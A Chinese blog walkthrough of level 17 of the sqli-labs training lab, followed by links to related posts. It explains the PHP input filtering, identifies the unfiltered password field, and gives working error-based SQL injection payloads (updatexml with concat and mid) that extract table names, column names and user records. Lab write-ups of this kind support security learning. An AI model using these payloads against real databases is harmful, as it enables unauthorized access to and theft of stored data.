sqli-labs第十七关详解

已于 2024-03-30 12:58:24 修改
阅读量4.2k 收藏 23
点赞数 13
文章标签: SQL注入
于 2022-04-26 12:50:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/124411903
版权

目录

分析

手工注入

爆表

爆字段

爆用户名

查字段值

分析

前十六道题都很简单没有什么过滤的方法,直到这关开始有绕过,我们先看一下源码

这里面定义了个函数,输入的usename会在这里被滤一次,再看看陌生的几个函数意思

get_magic_quotes_gpc(),该函数返回检测PHP环境配置变量get_magic_quotes_gpc的值,当该配置的值为1的时候,PHP就会对输入的单引号、双引号、反斜杠等字符转义(也就是在它前面加上反斜杠),当值为0的时候就不会转义

stripslashes(),该函数用于去除字符串里的反斜杠,也就是防止转义

ctype_digit(),该函数用于检测字符串是否为纯数字,是则返回true,不是返回false

mysql_real_escape_string(),该函数用于转义SQL语句中的特殊字符串,导致闭合失败等问题,防止SQL注入

intval(),该函数用于将字符串转化为纯数字

分析完后发现,只要经过这里一次,基本上不能进行SQL注入了,但是password没有被过滤,所以能以password这里作为注入点,但是呢必须得输对用户名才行

第一条SQL语句没有带password,第二条有,但是没有回显,可以利用报错盲注进行注入,这里附上一份报错盲注的原理解析SQL注入,xpath函数updatexml()和extractvalue()报错注入原理_金 帛的博客-CSDN博客

手工注入

爆表

-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,1)),1) #

爆字段

-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')),1) #

爆用户名

 -1' and updatexml(1,concat(0x7e,(select group_concat(username) from users)),1) #

 出错了,是因为在原SQL语句中

对应的是update的语句,不能select表中的某些值,但是我们可以用其他方法绕过 ,将表名users用(select username from users)a替换掉

查字段值

-1' and updatexml(1,concat(0x7e,(select group_concat(username) from (select username from users)a)),1)#

由于报错回显最多32位字符串,所以导致了回显不全的问题,我们可以利用字符串截断函数进行截断回显,这里我们使用mid函数,截断查询语句,从第32位开始查看回显31位字符串,也就是mid(SQL语句,32,31)

为了查看剩下的密码,接着我们构造payload

-1' and updatexml(1,concat(0x7e,mid((select group_concat(username) from (select username from users)a),32,32)),1)#

 继续查看后续的密码,构造payload

-1' and updatexml(1,concat(0x7e,mid((select group_concat(username) from (select username from users)a),64,32)),1)#

 继续截断也不会回显,将上面的字符串连接起来就能得到完整的密码了

金 帛
关注
  • 13
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 740
继续学习sqli-labs,本篇是less17
sqli-labs 17
m0_69548793的博客
08-27 1330
sqli-labs 17
sqli-labs-----第17
wyzhxhn的博客
11-10 816
基于报错的更新查新。
SQLI-labs-第十七
最新发布
weixin_54055099的博客
05-16 983
Sqli-labs第十七,二次注入、报错注入
sqli-labs 第十七
qq_64302290的博客
05-13 953
(2)当前面的输入的密码 为整数时,之所以可以被执行,是因为当我们输入的为整数时相当与给后面的语句加上了一个括号,并且有限执行括号中的内容。可以发现,这里使用update语句来修改用户的密码,并且对我们输入的用户名进行了过滤但并没有对密码进行过滤。大家可以看到在最后注入具体值的时候我们使用的是floor进行注入,是因为当我们使用updatexml进行注入时会爆下面的问题: 等我查阅资料后回来改正。经过我们的测试,当在密码出输入一个单引号时就会出现报错,对此注入点可能就在该位置。我们接着上面测试注入表名。
sqli-labs第十七
m0_73248913的博客
02-11 344
sqli-labs第十七教程
Sqlilabs-17
KAKA的博客
07-07 863
来到了 17 ,从这开始刚学习需要借助源码来配合学习,本学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
Sqli-labs靶场第17详解[Sqli-labs-less-17]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 832
根据题目及测试发现,注入点在New Password上并且后台会判断user是否存在,所以user选择一个知道的name:admin或domo。如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。单引号 '闭合 -- 报错注入。爆出DBMS 所有数据库。
sql注入-sqli-labs第17
weixin_46784800的博客
11-10 1650
sqli-labs第17 updatexml使用 第17键函数为updatexml函数: UpdateXML(xml_target, xpath_expr, new_xml) 其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。 updatexml(0,concat(0x7e, (select col2 from tableA limit 0,1),
最详细sqli-labs平台前十讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 3320
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
sqli-labs小游戏(1-20)详解
weixin_51356351的博客
10-22 974
第一 第一是联合查询注入 判断注入点----判断是数字型还是字符型----查询列数----查询显示位----获取数据库名----获取数据库中的表名----获取列名----获取列中的数据 http://localhost/sqli-labs-master/Less-1/?id=1’ – - http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=1-- - http://localhost/sqli-labs-master/Less-1/?id=1’
sqli-labs通(十七)
qq_65950075的博客
05-05 661
这一跟前面的卡都不一样,是全新的卡,页面是一个密码重置页面,需要输入用户名,然后输入新的密码,就会把我们的旧密码替换掉。所以就会用到数据库的update更新数据,不再是前面的查询数据,所以之前的联合注入和布尔盲注以及时间盲注都不能用了。这里我们要用到之前使用过的报错注入。所以我们使用mid()函数来截取,因为是从32位开始不能看到,所以我们从第32位开始截取,截取后32位。这里要先输入正确的用户名,验证成功后才会把新密码替换,所以我们输入。但是回显并没有完全,因为报错回显只能回显32位。
sqlilabs第17
wh1sper、的博客
04-29 1285
sqlilabs第17一、分析二、手注 一、分析 这题目叫做基于报错的更新查新。 遇事不决,就直接看源码。 通过源码我们得知当我们输入数据进去时,会先查询users表与我们输入进去的用户名对比。 如果没有这个用户,就会告诉你。(这肯定忍不了) 相反他会检查用户名。 在check_input中,我贴了函数的链接,师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数 二、手注 ...
sqli-labs第十七(post-报错注入)
qq_42266432的博客
08-29 895
进入到十七后发现这有点不同,上面多了一行提示:密码重新设置,咱也不懂啥意思,在试了写常规注入的方法后,没有发现什么可以利用的点,于是决定去看看代码,虽然我不会php 先看这一部分有sql语句的: 从users表中搜索出uname和psw,条件和psw无,只看uname mysql_fetch_array()好像能返回键值对,而且除了将数据以数字索引方式储存在数组中之外,还可以将数据作为联索引储存,用字段名作为键名。 uname正确的话,再将users表中psw更新,条件等于刚刚输入的unam.
Sqli-labs第十七之UpdateXML
qq_39511050的博客
08-28 723
updatexml函数,xpath表达式
sqli-labs17(基于post提交的单引号闭合的报错盲注)通思路
zyh1588的博客
11-11 511
小白回顾sql靶场17
SQL-labs的第17——报错注入(updatexml)
qq_73393033的博客
07-20 520
这一的网站是用来修改密码的,所以数据库会执行update这种查询方式,而不是select这种查询方式。我们发现用户名这一框输入数据不行,会进行过滤。所以我们这次在密码这一框中进行注入。
sqli-labs-master第17
m_ing
05-14 2767
前言:这一变化还是挺大的,让我们修改密码。 第17 http://192.168.89.134/sqli-labs-master/Less-17/ 到这里我们还是毫无头绪,只能看源代码 从源码中可以看到:接收到用户POST的uname和passwd后,首先根据uname查询数据库的username和password,若uname存在则用passwd替换password,若不存在则显示slap1.jpg 在用户名正确后,页面便能够返回Mysql错误信息 所以我们决定用报错注入 使用updatexml(
sqli-labs靶场第十七
gou1791241251的博客
12-27 897
十七有点特别,让我重置密码,但是注入的原理还是一样的。 在输入用户名的地方,我尝试了单引号,双引号,不输入,等测试去判断闭合方式,最终没有得到想要的结果 后来在输入密码的地方尝试了同样的操作,最终结果都是一样。。 实在没有了头绪我选择了代码审计! 在代码中可以看到,先是处理账号,如果账号存在,则才能重置密码,也就是说,如果账号不存在,输入密码也是没用的 在这里我们可以看到,后台接收到uname参数时,调用了一个函数进行过滤了用户输入的内容。但是没有对密码进行过滤,所以密码框才是真正的注入点 如果输入内容
sqli-labs-master通详解
09-10
很抱歉,我不能提供sqli-labs-master通详解。这些引用看起来是SQL注入攻击的示例链接,它们可能是用于演示和学习安全测试技术的实验室材料。然而,请注意,进行未经授权的SQL注入攻击是非法的,并且可能导致法律责任。如果您对安全测试和漏洞挖掘有兴趣,我建议您通过合法和合规的方式参与相培训和课程,以确保您的行为合法并且不会对他人造成伤害。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值